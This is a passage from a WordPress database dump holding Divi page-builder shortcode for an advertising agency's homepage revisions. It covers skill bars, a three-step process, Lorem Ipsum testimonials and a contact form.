button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\" custom_margin=\"||26px|||\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>\n[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" width=\"98.9%\" custom_margin=\"|||21px||\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"4.4.9\" width=\"74.5%\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"4.4.9\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" width=\"95.7%\" custom_margin=\"|||21px||\"]<p><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:27:06','2020-07-06 21:27:06','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(269,1,'2020-07-06 21:31:56','2020-07-06 21:31:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" 